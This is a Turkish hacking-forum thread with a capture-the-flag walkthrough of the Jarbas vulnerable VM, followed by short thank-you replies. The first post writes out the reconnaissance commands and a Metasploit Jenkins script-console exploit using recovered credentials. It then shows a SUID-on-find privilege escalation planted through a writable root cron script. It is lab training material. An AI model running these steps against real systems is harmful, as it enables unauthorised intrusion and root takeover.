THT DUYURU


Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

Jarbas Zafiyetli Makine Çözümü // Qwx

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
04/2012
Mesajlar:
2.730
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
623
Ticaret:
(0) %
11
2753
31-12-2018 18:34
#1
Jarbas Zafiyetli Makine Çözümü
Jarbas İndirme Linki ;

Kod:
https://www.vulnhub.com/entry/jarbas-1,232/

Makinemizin ilk açılış görüntüsü şu şekildedir.



Makinemizin ilk olarak IP adresini öğrenmek için netdiscover kullanıyoruz.
Kod:
netdiscover




Açık olan portlara bakmak için NMAP taramasını kullanıyoruz.

Kod:
nmap -sS -sV <adress>




IP adresimize giriş yaptığımızda bizi bu şekilde bir sayfa karşılıyor.



Portlarımızı incelediğimiz zaman 22 ve 80 nin dışında ek olarak 8080 portununda açık olduğunu görmekteyiz. Hemen burada ne olduğunu görmek adına giriş sağlıyoruz.



Bir giriş paneli bizi karşılıyor şimdi ilk adımımız bu giriş paneli bilgilerini elde etmek olacaktır. IP Adresindeki tüm içerikleri görmek için DIRB ile bir tarama gerçekleştireceğiz.

Kod:
dirb <adress> -w <wordlistkonumu> -X .txt,.html

Not : DIRB kodunda "<wordlistkonumu>" istediğiniz wordlisti kullanabilirsiniz, DIRB aracını yüklediğiniz zaman otomatik "/usr/share/wordlists/dirb/" bir şekilde buraya wordlistleriniz gelmektedir.
DIRB aramamız tamamlandı.




DIRB taramasından çıkan <adress>/access.html 'i ziyaret ettiğimizde bizde 3 tane şifrelenmiş veri vermektedir. Bu verilerin ne olduğunu çözmek adına bir siteden yardım alacağız.




Çıkan sonuçlarda hepsini teker teker denediğimizde sadece "eder" kullanıcı ismi olan ile giriş sağlayabiliyoruz, giriş yaptıktan sonra Jenkinsa Hoşgeldiniz! şeklinde bizi karşılıyor.



Sırada hangi açıklarımızın olduğunu bulmak olacak ve bunları nasıl sömürebiliriz aslında tam olayın başladığı kısım burası. M.etasploit için exploit adına bir araştırma yapmamız lazım ve "jenkins exploit" diye bir arama yapıyoruz.



Seçili sitedeki modül adını : "exploit/multi/http/jenkins_script_console" alıyoruz ve msf ' ye başlıyoruz.

Kod:
msfconsole

Kod:
 use exploit/multi/http/jenkins_script_console
 set target 1 
 set rhost <adress>
 set rport 8080
 set username eder
 set password vipsu
 set targeturi /
 run

Kod:
shell
 /bin/bash -i
find / -user root -writable -type f -not -path "/proc/*" 2>/dev/null


CleaningScript.sh adında bir script bulduk bu script'i indirip üzerinde değişiklik yapıp tekrar yükleyeceğiz.




Kod:
download CleaningScript.sh




chmod u+s /usr/bin/find komutu ile gerekli izinleri değiştirip root izinlerine sahip olacağız, değişiklikleri yaptıktan sonra tekrar upload ediyoruz.

Kod:
upload CleaningScript.sh


Upload ettikten sonra sadece biraz beklemek gerekiyor. Ardından erişim yükseltmemiz tamamlanacak. Ve bir süre geçtikten sonra artık root kullanıcısı yetkisindeyiz ve flag.txt ' yi arıyoruz.





Ve flag.txt




---------------------
A hacker does for love what others would not do for money.
Rhotav, ZuL-RaA Teşekkür etti.
ZuL-RaA - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
12/2017
Nereden:
Eyja
Mesajlar:
4.512
Konular:
298
Teşekkür (Etti):
757
Teşekkür (Aldı):
1524
Ticaret:
(0) %
31-12-2018 18:53
#2
Ellerine sağlık.
---------------------


cewl - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
26
Mesajlar:
2.857
Konular:
192
Teşekkür (Etti):
1
Teşekkür (Aldı):
882
Ticaret:
(0) %
31-12-2018 18:54
#3
elve sagliq (:
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
04/2012
Mesajlar:
2.730
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
623
Ticaret:
(0) %
01-01-2019 00:09
#4
Alıntı:
atmaca7887´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.


Teşekkür ederim.



Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
elve sagliq (:

Teşekkür ederim.
---------------------
A hacker does for love what others would not do for money.
InternetGhetto - ait Kullanıcı Resmi (Avatar)
Tamamen Askıya Alındı
Üyelik tarihi:
12/2018
Nereden:
Darh Veb
Mesajlar:
134
Konular:
4
Teşekkür (Etti):
0
Teşekkür (Aldı):
99
Ticaret:
(0) %
01-01-2019 00:10
#5
Ellerine Sağlık Hocam.
Veloue Teşekkür etti.
'Creative - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
03/2017
Mesajlar:
3.164
Konular:
95
Teşekkür (Etti):
211
Teşekkür (Aldı):
1334
Ticaret:
(0) %
04-01-2019 17:58
#6
Elinize Sağlık (:
---------------------
‘’ Hevesli üye yazdığına bakmayın hevesli değilim. Tşk.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.138
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3722
Ticaret:
(0) %
04-01-2019 18:38
#7
Ellerine sağlık.
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
ByQueny - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
12/2018
Nereden:
www
Mesajlar:
1.282
Konular:
19
Teşekkür (Etti):
26
Teşekkür (Aldı):
577
Ticaret:
(0) %
04-01-2019 18:51
#8
eline sağlık
--------------------- Bir ihtimal...
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
04/2012
Mesajlar:
2.730
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
623
Ticaret:
(0) %
04-01-2019 19:27
#9
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık (:
Teşekkür ederim.

Alıntı:
WhiteRed´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.
Teşekkür ederim.

Alıntı:
ByQueny´isimli üyeden Alıntı Mesajı göster
eline sağlık
Teşekkür ederim.
---------------------
A hacker does for love what others would not do for money.
King Kong - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
03/2017
Mesajlar:
2.396
Konular:
153
Teşekkür (Etti):
156
Teşekkür (Aldı):
543
Ticaret:
(0) %
04-01-2019 20:01
#10
Efsane Konu Olmuş Neden Rağbet Görmemiş... Ellerine Sağlık Hack İçin Önemli Bir Şey.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler